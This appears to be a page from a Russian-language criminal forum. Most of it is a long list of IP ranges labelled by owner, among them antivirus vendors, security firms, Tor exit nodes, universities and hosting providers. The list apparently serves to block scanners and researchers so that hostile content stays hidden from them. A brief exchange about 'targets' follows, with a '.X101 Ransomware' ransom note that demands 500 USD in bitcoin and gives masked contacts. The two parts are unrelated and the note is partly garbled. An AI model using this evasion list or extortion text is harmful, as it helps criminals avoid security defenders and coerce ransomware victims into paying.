66.102.0.0-66.102.15.255

# ADNET TELECOM IP RANGES

31.215.209.0-31.215.209.127

# MCAFEE IP RANGES

83.236.159.0-83.236.159.7
62.189.112.128-62.189.112.255
194.123.34.184-194.123.34.191
193.128.126.16-193.128.126.23
62.189.129.0-62.189.129.63
194.78.128.132-194.78.128.135
80.148.18.8-80.148.18.15
31.161.25.96-31.161.25.103
31.161.27.96-31.161.27.103
31.161.90.40-31.161.90.47
31.149.153.160-31.149.153.167
12.39.242.112-12.39.242.119
12.22.195.192-12.22.195.199
174.90.35.192-174.90.35.207
208.42.249.0-208.42.249.15
12.190.240.128-12.190.240.255
192.187.128.0-192.187.128.255
216.49.80.0-216.49.95.255
161.69.0.0-161.69.255.255
165.193.42.64-165.193.42.127
216.35.7.96-216.35.7.127
165.193.42.128-165.193.42.191
208.69.152.0-208.69.159.255
205.139.39.0-205.139.39.63
64.41.151.0-64.41.151.255
64.41.168.232-64.41.168.239
12.181.44.192-12.181.44.199
12.184.29.176-12.184.29.191
64.41.199.48-64.41.199.55
8.21.160.0-8.21.163.255
8.18.24.0-8.18.27.255

# HOSTWAY ROMANIA IP RANGES

193.223.101.0-193.223.101.255
89.33.207.0-89.33.207.255
91.209.102.0-91.209.102.255
83.246.0.0-83.246.15.255
188.215.38.0-188.215.38.255
46.102.248.0-46.102.248.255
193.226.167.120-193.226.167.123
89.41.60.0-89.41.61.255
176.223.192.0-176.223.255.255

# NOISEBRIDGE IP RANGES

173.254.216.64-173.254.216.95

# QUBE MANAGED SERVICES IP RANGES

81.91.253.0-81.91.253.255

# FORMLESS NETWORKING IP RANGES

199.48.147.32-199.48.147.47

# CHAOS COMPUTER CLUB IP RANGES

31.172.30.0-31.172.30.7
217.115.10.128-217.115.10.143
77.244.254.224-77.244.254.231

# MICROSOFT SINGAPORE IP RANGES

111.221.16.0-111.221.31.255

# ALIENVAULT IP RANGES

70.38.42.24-70.38.42.31
174.142.24.120-174.142.24.127
174.142.215.160-174.142.215.167
184.107.46.208-184.107.46.215
184.107.139.168-184.107.139.175
184.107.145.160-184.107.145.167
198.50.107.80-198.50.107.87

# AVIRA IP RANGES

81.12.221.96-81.12.221.127
62.146.66.176-62.146.66.191
195.243.52.96-195.243.52.103
62.157.152.32-62.157.152.63
62.146.87.168-62.146.87.175
62.146.210.0-62.146.210.255
62.146.40.24-62.146.40.31
80.190.143.224-80.190.143.255
62.146.211.0-62.146.211.255
80.190.155.0-80.190.155.255
80.190.154.0-80.190.154.255
80.190.129.16-80.190.129.23
80.190.133.160-80.190.133.175
212.211.136.112-212.211.136.119
62.146.64.144-62.146.64.159
80.190.130.224-80.190.130.255
80.190.130.192-80.190.130.223
212.62.197.128-212.62.197.191
89.105.212.0-89.105.212.127
212.79.247.128-212.79.247.255
89.105.213.128-89.105.213.255
89.105.212.168-89.105.212.175
89.105.214.32-89.105.214.63
62.146.28.120-62.146.28.127
89.105.213.64-89.105.213.127
89.105.216.0-89.105.217.255
80.190.148.96-80.190.148.127
80.190.148.64-80.190.148.95
89.105.206.240-89.105.206.247
212.114.195.64-212.114.195.71
5.153.4.224-5.153.4.231
89.105.200.96-89.105.200.111

# COMODO GROUP IP RANGES

67.23.50.0-67.23.51.255
199.66.200.0-199.66.207.255
97.107.175.140-97.107.175.143
70.36.29.32-70.36.29.35
70.36.29.24-70.36.29.27
82.109.38.200-82.109.38.207
82.110.55.12-82.110.55.15
85.91.228.128-85.91.228.191
91.199.212.0-91.199.212.255
91.209.196.0-91.209.196.255
91.212.12.0-91.212.12.255
82.113.138.16-82.113.138.23
88.39.235.56-88.39.235.63
193.104.21.0-193.104.21.255
178.255.82.0-178.255.82.127
178.255.83.0-178.255.83.63
199.66.200.0 - 199.66.207.255

# AVG TECHNOLOGIES IP RANGES

212.96.161.224-212.96.161.255
212.96.183.0-212.96.183.31
213.7.204.176-213.7.204.191
82.142.105.96-82.142.105.111
213.106.147.112-213.106.147.127
212.4.138.48-212.4.138.63
212.4.138.128-212.4.138.191
212.4.138.224-212.4.138.255
89.233.128.96-89.233.128.111
193.85.33.208-193.85.33.223
212.4.152.224-212.4.152.255
212.96.161.96-212.96.161.127
195.5.219.216-195.5.219.223
212.67.80.0-212.67.80.63
212.67.69.232-212.67.69.239
93.184.217.0-93.184.217.31
93.184.217.32-93.184.217.47
93.184.217.64-93.184.217.127
93.184.211.64-93.184.211.127
93.184.211.0-93.184.211.31
212.4.153.64-212.4.153.79
72.3.156.160-72.3.156.175

# ESET IP RANGES

213.215.116.224-213.215.116.239
212.47.6.196-212.47.6.199
195.46.70.40-195.46.70.47
88.208.109.228-88.208.109.231
195.168.53.48-195.168.53.63
217.75.75.88-217.75.75.95
217.75.75.96-217.75.75.127
77.78.101.144-77.78.101.159
88.208.88.0-88.208.88.127
77.78.102.0-77.78.102.255
193.85.203.144-193.85.203.159
62.67.186.0-62.67.186.255
94.112.253.168-94.112.253.175

# DOCTOR WEB IP RANGES

195.88.252.0-195.88.253.255
194.85.20.0-194.85.20.255

# PANDA SECURITY IP RANGES

195.235.47.0-195.235.47.255
195.235.200.0-195.235.200.255
193.104.218.0-193.104.218.255
62.7.85.16-62.7.85.31
91.216.218.0-91.216.218.255
62.97.120.240-62.97.120.247
195.76.4.168-195.76.4.175
195.76.195.160-195.76.195.167
62.99.71.113-62.99.71.113
62.99.76.3-62.99.76.3
62.99.77.165-62.99.77.165
62.99.77.184-62.99.77.184
62.99.78.125-62.99.78.125
62.99.80.195-62.99.80.195
212.8.79.64-212.8.79.127
212.142.140.122-212.142.140.127
212.142.148.66-212.142.148.66
212.142.175.22-212.142.175.22

# SYMANTEC IP RANGES

213.156.160.0-213.156.191.255
195.212.45.32-195.212.45.63
62.190.166.192-62.190.166.255
62.99.191.24-62.99.191.31
195.75.106.64-195.75.106.95
212.226.130.152-212.226.130.159
80.227.131.216-80.227.131.223
213.88.133.112-213.88.133.119
213.156.161.0-213.156.161.31
213.156.162.64-213.156.162.79
213.156.162.112-213.156.162.127
213.156.163.0-213.156.163.255
213.156.170.0-213.156.170.255
83.64.142.128-83.64.142.135
213.139.240.184-213.139.240.191
62.237.120.128-62.237.120.135
213.71.162.0-213.71.162.15
217.33.67.16-217.33.67.31
217.89.94.24-217.89.94.31
213.47.214.40-213.47.214.47
192.92.94.0-192.92.94.255
213.156.160.0-213.156.160.255
194.100.208.224-194.100.208.239
194.16.221.144-194.16.221.159
195.198.213.160-195.198.213.163
78.136.60.0-78.136.60.7
62.17.134.112-62.17.134.119
194.78.121.16-194.78.121.23
31.222.134.12-31.222.134.15
62.17.145.232-62.17.145.239
217.33.59.160-217.33.59.175
199.43.185.0-199.43.194.255
199.85.125.0-199.85.127.255
198.6.32.0-198.6.63.255
204.178.110.224-204.178.110.255
216.10.192.0-216.10.207.255
155.64.0.0-155.64.255.255
206.204.10.192-206.204.10.223
216.250.16.0-216.250.31.255
208.185.197.0-208.185.197.255
216.35.137.160-216.35.137.191
216.35.137.128-216.35.137.143
216.35.137.192-216.35.137.255
198.187.197.0-198.187.198.255
198.153.190.0-198.153.196.255
166.98.0.0-166.98.255.255
192.251.86.0-192.251.86.255
143.127.0.0-143.127.255.255
64.171.125.128-64.171.125.135
208.194.116.0-208.194.116.255
208.194.152.0-208.194.152.255
208.213.242.0-208.213.242.255
208.185.207.0-208.185.207.255
63.110.89.208-63.110.89.223
209.249.184.0-209.249.184.255
209.249.114.0-209.249.114.255
65.214.150.48-65.214.150.55
63.110.247.0-63.110.247.31
66.45.123.16-66.45.123.31
72.32.137.226-72.32.137.227

# INETU INC IP RANGES

94.103.24.0-94.103.24.127
94.103.31.0-94.103.31.255
94.103.24.128-94.103.24.255
159.255.220.128-159.255.220.223
209.235.192.0-209.235.255.255
74.85.128.0-74.85.143.255

# ABOVENET COMM. IP RANGES

64.124.0.0-64.125.255.255
209.66.64.0-209.66.127.255

# LEVEL 3 COMM. IP RANGES

208.48.224.0-208.50.127.255

# INTERNAP IP RANGES

74.217.0.0-74.217.255.255

# INTERNET IDENTITY IP RANGES

66.150.14.160-66.150.14.191
63.251.10.176-63.251.10.191
63.251.6.112-63.251.6.127
66.150.9.128-66.150.9.191
69.25.31.160-69.25.31.191
66.151.97.64-66.151.97.127

# RELIANCE INFOCOM INDIA IP RANGES

220.225.69.0-220.225.72.255

# MICROSOFT IP RANGES

65.52.0.0-65.55.255.255

# G-DATA SOFTWARE IP RANGES

195.205.70.0-195.205.70.255
212.23.128.176-212.23.128.179
212.23.140.96-212.23.140.127
212.23.136.48-212.23.136.63

# SOPHOS IP RANGES

194.203.134.128-194.203.134.255
213.86.172.128-213.86.172.159
212.161.106.240-212.161.106.247
85.35.56.80-85.35.56.87
88.44.165.208-88.44.165.223
81.93.18.144-81.93.18.151
213.139.142.80-213.139.142.95
81.223.13.240-81.223.13.255
85.126.49.88-85.126.49.95
85.222.200.248-85.222.200.255
193.189.184.158-193.189.184.158
145.253.124.128-145.253.124.159
195.171.192.0-195.171.192.127
195.171.192.128-195.171.192.255
212.243.136.40-212.243.136.47
178.15.194.112-178.15.194.127
195.65.248.136-195.65.248.143

# DATATRAN SYSTEMS IP RANGES

204.12.235.0-204.12.235.31
216.22.45.128-216.22.45.159
204.12.237.8-204.12.237.15
204.12.194.0-204.12.194.31
204.12.244.32-204.12.244.47
204.12.224.32-204.12.224.63
204.12.248.96-204.12.248.127
204.12.248.224-204.12.248.255
204.12.202.32-204.12.202.63
204.12.248.128-204.12.248.159
204.12.192.192-204.12.192.223

# NETSUMO IP RANGES

37.130.227.128-37.130.227.135

# THE NEW YORK INTERNET COMPANY IP RANGES

204.248.157.0-204.248.157.255
207.12.88.0-207.12.95.255
63.165.240.0-63.165.255.255
64.90.160.0-64.90.191.255
66.111.0.0-66.111.15.255
204.97.244.0-204.97.244.255
67.221.176.0-67.221.191.255
64.147.96.0-64.147.127.255
173.228.128.0-173.228.159.255
96.47.64.0-96.47.79.255
199.83.60.0-199.83.63.255
162.208.116.0-162.208.119.255

# TECHCREA SOLUTIONS IP RANGES

91.229.20.0-91.229.20.255
91.236.239.0-91.236.239.255
91.236.254.0-91.236.255.255
185.13.36.0-185.13.37.255
185.13.38.0-185.13.39.255

# SOLUTIONPRO INC. IP RANGES

204.228.192.0-204.228.255.255
198.60.192.0-198.60.255.255
206.207.64.0-206.207.127.255
204.229.96.0-204.229.127.255
199.104.0.0-199.104.63.255
206.206.0.0-206.206.63.255
204.229.0.0-204.229.31.255
204.134.200.0-204.134.215.255
204.134.222.0-204.134.223.255
204.134.232.0-204.134.239.255

# MOSCOW LOCAL TELEPHONE NETWORK IP RANGES

94.29.0.0-94.29.63.255

# MAXIS BROADBAND MALAYSIA IP RANGES

113.210.35.0-113.210.39.255

# 2COM CO IP RANGES

188.244.35.0-188.244.35.255

# POWERTECH INFO SYSTEMS IP RANGES

195.159.140.0-195.159.140.255

# LINODE IP RANGES

173.255.192.0-173.255.255.255
198.58.96.0-198.58.127.255
96.126.96.0-96.126.127.255
66.228.32.0-66.228.63.255
192.155.80.0-192.155.95.255
72.14.176.0-72.14.191.255
97.107.128.0-97.107.143.255
74.207.224.0-74.207.255.255
173.230.128.0-173.230.159.255
198.74.48.0-198.74.63.255
192.81.128.0-192.81.135.255
50.116.0.0-50.116.63.255
66.175.208.0-66.175.223.255
162.216.16.0-162.216.19.255

# ARUBA S.P.A. IP RANGES

62.149.224.0-62.149.255.255

# MASSACHUSETTS INSTITUTE OF TECHNOLOGY IP RANGES

128.30.0.0-128.30.255.255
128.31.0.0-128.31.255.255
192.233.95.0-192.233.95.255
18.0.0.0-18.255.255.255
128.52.0.0-128.52.255.255
4.21.160.8-4.21.160.15
192.12.11.0-192.12.11.255
192.54.222.0-192.54.222.255

# INTEGRA TELECOM IP RANGES

64.122.0.0-64.122.255.255
70.98.0.0-70.98.255.255

# ZWIEBELFREUNDE ( TOR EXIT NODES ) IP RANGES

77.247.181.160-77.247.181.175
109.163.233.192-109.163.233.207
192.36.27.0-192.36.27.255
192.36.31.0-192.36.31.255
192.36.41.0-192.36.41.255
192.36.61.0-192.36.61.255

# AT&T IP RANGES

99.107.207.0-99.107.207.255

# MALCOVERY SECURITY IP RANGES

166.78.235.176-166.78.235.183
166.78.235.60-166.78.235.63

# TIME WARNER CABLE IP RANGES

67.78.0.0-67.79.255.255

# OPAL TELECOM DSL IP RANGES

92.24.0.0-92.25.255.255
78.151.0.0-78.151.255.255
78.146.0.0-78.146.255.255

# BEZEQINT BROADBAND IP RANGES

109.64.0.0-109.64.255.255
84.110.238.0-84.110.242.255

# UNSPAM TECHNOLOGIES IP RANGES

66.114.197.224-66.114.197.255
209.124.55.32-209.124.55.63

# HURRICANE ELECTRIC IP RANGES

64.62.128.0-64.62.255.255

# TELUS COMMUNICATIONS IP RANGES

207.102.137.0-207.102.138.255

# NEOSTRADA ADSL IP RANGES

79.185.218.0-79.185.219.255

# MAROCTELECOM IP RANGES

41.140.46.0-41.140.47.255

# HOSTDIME IP RANGES

64.37.48.0-64.37.63.255
199.168.184.0-199.168.191.255
66.195.16.0-66.195.17.255
66.195.18.0-66.195.19.255
66.195.124.0-66.195.125.255
66.195.126.0-66.195.127.255
66.195.240.0-66.195.243.255
72.29.64.0-72.29.95.255
67.23.224.0-67.23.255.255
66.7.192.0-66.7.223.255
184.171.240.0-184.171.255.255
8.33.160.0-8.33.167.255
8.33.168.0-8.33.175.255
8.19.188.0-8.19.191.255
198.136.48.0-198.136.63.255
198.49.64.0-198.49.79.255

# HETZNER ONLINE IP RANGES

80.150.215.0-80.150.215.255
213.239.210.0-213.239.211.255
213.133.96.0-213.133.127.255
62.128.13.200-62.128.13.203
213.239.192.0-213.239.255.255
85.10.192.0-85.10.255.255
193.47.99.0-193.47.99.255
85.10.208.0-85.10.215.255
88.198.0.0-88.198.255.255
213.239.192.0-213.239.199.255
213.239.200.0-213.239.201.255
213.239.204.0-213.239.207.255
85.10.249.240-85.10.249.255
213.133.112.36-213.133.112.39
213.239.246.192-213.239.246.255
88.198.16.0-88.198.31.255
88.198.32.0-88.198.63.255
213.239.242.248-213.239.242.251
213.239.242.244-213.239.242.247
213.239.242.236-213.239.242.239
88.198.243.224-88.198.243.239
78.46.0.0-78.47.255.255
213.239.229.0-213.239.229.255
213.239.240.0-213.239.240.255
213.239.252.0-213.239.252.255
213.239.242.200-213.239.242.203
78.47.200.192-78.47.200.255
213.239.239.188-213.239.239.191
213.133.122.224-213.133.122.239
88.198.254.200-88.198.254.207
213.239.242.220-213.239.242.223
213.239.239.124-213.239.239.127
213.239.247.200-213.239.247.203
213.239.239.16-213.239.239.19
213.239.239.112-213.239.239.115
213.239.238.0-213.239.238.255
213.239.239.128-213.239.239.131
213.239.239.168-213.239.239.171
213.239.239.172-213.239.239.175
213.239.239.44-213.239.239.47
213.239.242.208-213.239.242.211
213.239.247.208-213.239.247.211
213.239.242.196-213.239.242.199
213.239.242.252-213.239.242.255
85.10.220.240-85.10.220.247
213.239.251.48-213.239.251.63
213.133.117.0-213.133.117.255
213.239.236.64-213.239.236.127
213.239.227.128-213.239.227.255
78.46.0.0-78.46.1.255
78.46.2.0-78.46.3.255
78.46.8.0-78.46.9.255
78.46.4.0-78.46.5.255
188.40.0.0-188.40.255.255
213.133.127.245-213.133.127.246
213.133.127.131-213.133.127.131
213.133.127.134-213.133.127.134
213.133.127.136-213.133.127.136
213.133.127.147-213.133.127.147
213.133.127.165-213.133.127.173

# MICHEAL MCDONOUGH IP RANGES

66.248.200.112-66.248.200.127

# JIFFYBOX SERVERS IP RANGES

109.239.58.0-109.239.58.255
109.239.48.0-109.239.48.255
109.239.49.0-109.239.49.255
109.239.50.0-109.239.50.255
109.239.57.0-109.239.57.255
109.239.60.0-109.239.60.255
46.252.16.0-46.252.16.255
46.252.21.0-46.252.21.255
46.252.24.0-46.252.27.255
141.0.20.0-141.0.21.255
176.221.42.0-176.221.43.255
176.221.46.0-176.221.46.255
37.200.98.0-37.200.99.255
93.180.154.0-93.180.155.255
93.180.156.0-93.180.156.255
93.180.157.0-93.180.157.255

# THEPLANET.COM IP RANGES

184.172.0.0-184.173.255.255
207.218.192.0-207.218.255.255
216.12.192.0-216.12.223.255
174.132.0.0-174.133.255.255
216.234.224.0-216.234.255.255
216.185.96.0-216.185.127.255
216.40.192.0-216.40.255.255
69.41.224.0-69.41.255.255
64.246.0.0-64.246.63.255
216.127.64.0-216.127.95.255
207.44.128.0-207.44.255.255
64.5.32.0-64.5.63.255
69.56.128.0-69.56.255.255
66.98.128.0-66.98.255.255
69.57.128.0-69.57.159.255
69.93.0.0-69.93.255.255
67.15.0.0-67.15.255.255
67.18.0.0-67.19.255.255
70.84.0.0-70.87.255.255
174.120.0.0-174.123.255.255
209.85.0.0-209.85.127.255
74.52.0.0-74.55.255.255
209.62.0.0-209.62.127.255
75.125.0.0-75.125.255.255

# EDION CORP. IP RANGES

203.148.96.0-203.148.127.255

# FHCDMA WIRELESS NETWORK IP RANGES

212.119.103.0-212.119.105.127

# ONEANDONE INTERNET IP RANGES

74.208.0.0-74.208.255.255

# RACKSPACE CLOUD SERVERS IP RANGES

50.57.232.0-50.57.235.255
67.23.0.0-67.23.15.255
67.23.32.0-67.23.47.255
108.166.120.0-108.166.123.255
50.56.212.0-50.56.212.255
50.56.216.0-50.56.219.255
50.56.248.0-50.56.251.255
50.56.236.0-50.56.239.255
50.56.224.0-50.56.227.255
50.57.48.0-50.57.51.255
50.57.52.0-50.57.55.255
50.57.44.0-50.57.47.255
50.57.64.0-50.57.127.255
50.57.40.0-50.57.43.255
50.56.220.0-50.56.223.255
50.57.36.0-50.57.39.255
50.56.232.0-50.56.235.255
50.56.240.0-50.56.243.255
50.57.224.0-50.57.227.255
50.56.244.0-50.56.247.255
108.166.56.0-108.166.59.255
108.166.112.0-108.166.115.255
50.56.204.0-50.56.204.255
50.56.202.0-50.56.202.255
108.166.124.0-108.166.127.255
50.56.209.0-50.56.209.255
198.61.192.0-198.61.192.255
198.61.220.0-198.61.220.255
50.56.210.0-50.56.210.255
50.56.203.0-50.56.203.255
50.56.214.0-50.56.214.255
50.56.186.0-50.56.186.255
50.56.215.0-50.56.215.255
50.56.158.0-50.56.159.255
50.56.170.0-50.56.171.255
108.166.60.0-108.166.60.255
50.56.205.0-50.56.205.255
50.56.207.0-50.56.207.255
108.166.108.0-108.166.111.255
50.56.200.0-50.56.200.255
108.166.52.0-108.166.55.255
108.171.178.0-108.171.178.255
50.56.213.0-50.56.213.255
50.56.211.0-50.56.211.255
50.56.206.0-50.56.206.255
108.171.181.0-108.171.181.255
108.166.61.0-108.166.61.255
108.171.176.0-108.171.176.255
108.166.116.0-108.166.119.255
108.166.63.0-108.166.63.255
108.171.190.0-108.171.190.255
108.171.160.0-108.171.163.255
108.171.182.0-108.171.182.255
65.61.189.0-65.61.189.255
108.166.96.0-108.166.99.255
198.101.144.0-198.101.159.255
198.101.224.0-198.101.239.255
198.101.240.0-198.101.247.255
50.56.208.0-50.56.208.255
108.171.184.0-108.171.184.255
198.101.176.0-198.101.176.255
198.101.177.0-198.101.177.255
198.101.178.0-198.101.178.255
198.101.179.0-198.101.179.255
108.171.191.0-108.171.191.255
108.171.185.0-108.171.185.255
66.216.100.0-66.216.100.255
108.166.62.0-108.166.62.255
108.171.172.0-108.171.175.255
108.171.187.0-108.171.187.255
108.171.188.0-108.171.188.255
198.101.180.0-198.101.180.255
198.61.169.0-198.61.169.255
198.61.161.0-198.61.161.255
108.171.189.0-108.171.189.255
198.61.173.0-198.61.173.255
198.61.166.0-198.61.166.255
198.61.181.0-198.61.181.255
198.61.172.0-198.61.172.255
198.61.186.0-198.61.186.255
198.61.179.0-198.61.179.255
198.61.160.0-198.61.160.255
198.61.163.0-198.61.163.255
50.57.228.0-50.57.231.255
108.166.104.0-108.166.107.255
50.56.143.0-50.56.143.255
108.171.183.0-108.171.183.255
50.56.201.0-50.56.201.255
198.101.192.0-198.101.223.255
108.171.179.0-108.171.179.255
108.171.177.0-108.171.177.255
198.101.181.0-198.101.181.255
108.171.180.0-108.171.180.255
108.171.186.0-108.171.186.255
198.61.198.0-198.61.198.255
198.61.216.0-198.61.216.255
198.61.222.0-198.61.222.255
209.20.64.0-209.20.95.255
67.207.128.0-67.207.143.255
67.207.148.0-67.207.148.255
184.106.128.0-184.106.143.255
50.56.64.0-50.56.127.255
50.56.28.0-50.56.31.255
173.203.48.0-173.203.48.255

# ADRIAN HALMAGYI IP RANGES

78.157.195.0-78.157.195.255
78.157.203.0-78.157.203.255
78.157.204.0-78.157.204.255

# CORBINA TELECOM IP RANGES

89.178.248.0-89.178.253.255
128.74.226.0-128.74.228.255

# PSINET INC. IP RANGES

38.100.20.0-38.100.21.255

# RUTGERS UNIVERSITY IP RANGES

128.6.0.0-128.6.255.255
165.230.0.0-165.230.255.255
192.12.88.0-192.12.88.255
204.52.215.0-204.52.215.255
198.151.130.0-198.151.130.255
130.156.133.0-130.156.133.255

# EBAY INC. IP RANGES

63.169.4.0-63.169.4.255
208.14.218.16-208.14.218.31
208.34.52.0-208.34.55.255
66.135.192.0-66.135.223.255
65.168.176.224-65.168.176.239
64.68.78.0-64.68.79.255
63.171.24.16-63.171.24.31
198.69.206.176-198.69.206.191
216.113.160.0-216.113.191.255
66.211.160.0-66.211.191.255

# UROSPACE IP RANGES

193.200.160.0-193.200.160.255
178.17.164.0-178.17.164.7

# ADATPARK IP RANGES

195.228.45.0-195.228.45.255

# VIAWEST IP RANGES

64.64.212.0-64.64.217.255
216.46.160.0-216.46.191.255
64.90.192.0-64.90.207.255
64.78.176.0-64.78.183.255
64.78.184.0-64.78.199.255
64.78.144.0-64.78.159.255
64.78.224.0-64.78.239.255
216.38.192.0-216.38.223.255
216.87.64.0-216.87.95.255
216.150.192.0-216.150.223.255
216.58.128.0-216.58.175.255
206.71.64.0-206.71.95.255
204.246.128.0-204.246.151.255
216.24.128.0-216.24.159.255
66.114.96.0-66.114.127.255
216.241.96.0-216.241.111.255
209.170.192.0-209.170.223.255
207.189.96.0-207.189.127.255
216.241.160.0-216.241.191.255
64.58.224.0-64.58.239.255
66.51.0.0-66.51.31.255
66.97.128.0-66.97.143.255
216.250.128.0-216.250.143.255
66.133.96.0-66.133.127.255
68.142.128.0-68.142.159.255
216.145.112.0-216.145.127.255
67.208.128.0-67.208.143.255
74.63.128.0-74.63.191.255
76.9.176.0-76.9.187.255
67.21.167.0-67.21.171.255
209.236.96.0-209.236.111.255
64.64.202.0-64.64.205.255
199.16.42.0-199.16.43.255
64.64.210.0-64.64.210.255

# TOR EXIT NODES IP RANGES

37.221.161.232-37.221.161.239
94.126.178.0-94.126.178.7

# SOPRADO GMBH IP RANGES

213.61.149.96-213.61.149.127

# RELIABLE WEB SERVICES IP RANGES

66.230.230.0-66.230.230.255

# SWISS PRIVACY FOUNDATION IP RANGES

77.109.138.40-77.109.138.47
77.109.139.24-77.109.139.31
62.220.135.128-62.220.135.135

# UBIQUITY SERVER IP RANGES

64.120.16.0-64.120.19.255
70.32.32.0-70.32.32.255
69.147.236.0-69.147.236.255
64.120.2.0-64.120.2.255
172.255.144.0-172.255.147.255
173.208.32.0-173.208.39.255
173.234.12.0-173.234.15.255
23.19.32.0-23.19.35.255
173.234.88.0-173.234.89.255
172.255.40.0-172.255.43.255
108.62.56.0-108.62.63.255
173.234.80.0-173.234.83.255
142.234.168.0-142.234.175.255
70.32.34.0-70.32.34.255
142.91.88.0-142.91.95.255
174.34.151.0-174.34.151.255
174.34.144.0-174.34.145.255
173.234.180.0-173.234.183.255
64.120.4.0-64.120.7.255
173.234.188.0-173.234.188.255
108.62.220.0-108.62.220.127
108.62.192.0-108.62.195.255
108.62.152.0-108.62.159.255
108.177.216.0-108.177.219.255
23.19.80.0-23.19.83.255
23.19.84.0-23.19.87.255
108.62.200.0-108.62.203.255
108.62.252.0-108.62.255.255
23.19.124.0-23.19.127.255
64.120.123.0-64.120.123.255
23.19.128.0-23.19.131.255
23.19.168.0-23.19.171.255
23.19.216.0-23.19.219.255
23.19.184.0-23.19.187.255
108.177.244.0-108.177.247.255
23.19.248.0-23.19.251.255
64.120.50.64-64.120.50.127
108.62.5.0-108.62.5.255
142.91.112.0-142.91.115.255
142.91.208.0-142.91.211.255
142.234.176.0-142.234.179.255
142.91.56.0-142.91.59.255
142.91.116.0-142.91.119.255
147.255.224.0-147.255.231.255
216.6.236.160-216.6.236.167
216.6.236.168-216.6.236.175
142.234.104.0-142.234.111.255
142.234.180.0-142.234.183.255
142.234.188.0-142.234.191.255
142.234.232.0-142.234.239.255

# SECURE DRAGON IP RANGES

199.167.28.0-199.167.31.255
198.57.44.0-198.57.47.255
162.211.64.0-162.211.67.255

# INTERGENIA IP RANGES

217.172.171.0-217.172.171.255
85.25.0.0-85.25.255.255
217.172.160.0-217.172.191.255
62.75.128.0-62.75.255.255
62.75.173.0-62.75.173.255
217.118.16.0-217.118.31.255
62.75.200.0-62.75.200.255
80.86.80.0-80.86.95.255
62.225.124.200-62.225.124.207
62.75.235.0-62.75.235.255
217.172.166.0-217.172.166.15
80.86.86.0-80.86.86.255
188.138.0.0-188.138.127.255
62.75.129.144-62.75.129.159
80.86.89.96-80.86.89.111
62.75.136.0-62.75.136.127

# A1COLO IP RANGES

216.17.96.0-216.17.111.255
64.6.96.0-64.6.111.255

# BT UK IP RANGES

109.157.65.0-109.157.71.0

# CHINANET IP RANGES

220.181.0.0-220.181.255.255

# KEYWEB IP RANGES

62.110.227.208-62.110.227.215
217.58.196.224-217.58.196.224
217.58.204.136-217.58.204.143
217.58.104.136-217.58.104.143
217.141.182.0-217.141.182.15
212.110.112.192-212.110.112.223
62.141.48.0-62.141.63.255
193.19.78.0-193.19.79.255
62.141.48.0-62.141.55.255
62.141.56.0-62.141.63.255
217.114.208.0-217.114.223.255
193.22.254.0-193.22.254.255
193.16.98.0-193.16.98.255
194.24.230.0-194.24.231.255
84.19.160.0-84.19.191.255
84.19.176.0-84.19.191.255
87.118.64.0-87.118.127.255
87.118.96.0-87.118.127.255
217.114.218.40-217.114.218.47
87.118.82.0-87.118.95.255
95.169.160.0-95.169.191.255
95.169.190.0-95.169.191.255
95.169.186.0-95.169.187.255
95.169.188.0-95.169.189.255
95.169.184.0-95.169.185.255

# FDCSERVERS IP RANGES

50.7.0.0-50.7.255.255
66.90.64.0-66.90.127.255
208.53.128.0-208.53.191.255
67.159.0.0-67.159.63.255
198.16.64.0-198.16.127.255
204.45.0.0-204.45.255.255
76.73.0.0-76.73.127.255
74.63.64.0-74.63.127.255
108.179.64.0-108.179.127.255
192.240.96.0-192.240.127.255
216.227.128.0-216.227.191.255
198.255.0.0-198.255.127.255

# LEASEWEB GERMANY IP RANGES

46.165.216.0-46.165.223.255

# EUSERV.DE IP RANGES

81.7.13.0-81.7.13.255
81.7.10.0-81.7.10.255

# A100 ROW IP RANGES

177.71.128.0-177.71.255.255

# MICROSOFT IP RANGES

157.54.0.0-157.60.255.255

# WEHOSTWEBSITES.COM

162.213.216.0-162.213.223.255

# ANTISPAM EUROPE

83.246.65.0-83.246.65.255

# YAHOO

98.136.0.0-98.139.255.255
66.196.65.38
66.196.73.96
66.196.90.100
66.196.90.178
66.196.72.91
66.196.90.82
66.196.90.216
66.196.90.215

# MOSCOW COLOCATION

109.68.191.0-109.68.191.255

# HOSTMASTER LIBERTY GLOBAL

95.97.0.0-95.97.127.255

# GOOGLE CLOUD

23.236.48.0-23.236.63.255

# OPERA

141.0.50.0-141.0.255.255

# INDIAN ISP ( MICROSOFT/GOOGLE-RELATED )

121.240.0.0-121.247.255.255

# GODADDY

50.62.0.0-50.63.255.255

# CORPORATION SERVICES WORLDWIDE

65.123.142.176-65.123.142.191

# NETVISION

93.173.0.0-93.173.255.255

# GOOGLE CLOUD

107.178.192.0-107.178.255.255

# TRUSTWAVE HOLDINGS

204.13.200.0-204.13.203.255
94.75.208.0-94.75.208.255

# WEBSENSE-NET2

208.80.192.0-208.80.199.255

и как там таргеты?
Примерно вот так:
###############################################################################
########### You became victim of the .X101 Ransomware-Virus #############
###############################################################################
## MachineID: ********************* and LaunchID: ****************** ##
###############################################################################
## The harddisks of your computer have been encrypted with an military grade ##
## encryption algorithm TermCryptV101+RSA2048. ##
## There is no way to restore your data without a special key. ##
###############################################################################
###############################################################################
##To decrypt the files, you need to pay 500 USD in bitcoins to the BTC wallet##
below,then after 1 confirmation of the bitcoin network, ##
>>>>you can get the decryptor by writing to the following contact contacts!<<<<
## --------------------------------------------------------------------------##
## BTC Wallet - **************************************************+ ##
## --------------------------------------------------------------------------##
## Exchangers for exchanging for cryptocurrency: ##
## ************************** ##
## If you want to decrypt your files, you have to get RSA private key. ##
## After the successful payment and decrypting your files, we will give ##
## you FULL instructions HOW to IMPROVE your security system. ##
## TELEGRAM us: >> **************+ << ##
## Jabber: >> *********************+ FULL ONLINE << ##
�'Do not rename encrypted files. #
�'Do not try to decrypt your data using third party software, #
�'it may cause permanent data loss. #
�'Do not try to decrypt your data using third party software, #
�'it may cause permanent data loss. #
===============================================================================
>>> Do not pay data recovery companies to get the key, they will email me! <<<
################## We ready to answer all your questions! #####################
>>>>>>>>>>>>>>>>> HOW to understand that we are NOT scammers?<<<<<<<<<<<<<<<<<<
######### You can ask SUPPORT for the TEST-decryption for ONE file ! ###########
 
Последнее редактирование:
